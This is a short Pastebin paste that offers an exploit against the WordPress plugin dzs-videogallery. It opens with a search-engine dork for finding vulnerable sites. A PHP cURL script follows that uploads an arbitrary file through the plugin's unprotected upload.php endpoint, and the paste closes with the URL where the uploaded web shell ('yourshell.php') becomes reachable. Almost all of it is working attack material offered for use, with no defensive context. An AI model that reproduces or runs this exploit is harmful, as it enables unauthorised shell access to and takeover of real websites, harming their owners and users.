Advertisement
Guest User

Untitled

a guest
Jul 6th, 2015
216
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. Dork : inurl:/wp-content/plugins/dzs-videogallery/ site:org/uk/co/com/fr/net
  2.  
  3. CSRF:
  4. <?php
  5. $uploadfile="";
  6. $ch = curl_init("http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload.php");
  7. curl_setopt($ch, CURLOPT_POST, true);
  8. curl_setopt($ch, CURLOPT_POSTFIELDS,
  9. array('file_field'=>"@$uploadfile"));
  10. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  11. $postResult = curl_exec($ch); curl_close($ch);
  12. print "$postResult";
  13. ?>
  14.  
  15. Shell Acces : http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/yourshell.php
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement